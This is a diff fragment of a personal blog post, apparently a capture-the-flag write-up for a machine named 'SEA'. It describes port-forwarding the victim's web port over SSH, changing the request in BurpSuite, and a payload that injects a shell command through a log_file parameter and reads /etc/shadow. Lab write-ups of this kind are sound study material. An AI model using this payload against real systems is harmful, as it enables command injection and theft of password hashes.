v3l1d/v3l1d.github.io/content/posts/SEA/index.md

 ```

 ![](attachment/5e7f51c554cca528be1ef76f440f477d.png)

-Manipulate burp request on http://localhost:8888 after forwarding this port trough ssh from 8080 of the victim
+Manipulate the request on http://localhost:8888 with BurpSuite, after forwarding this port trough ssh from 8080 of the victim

 ```shell
 log_file=/etc/shadow;ls&analyze_log=/etc/shadow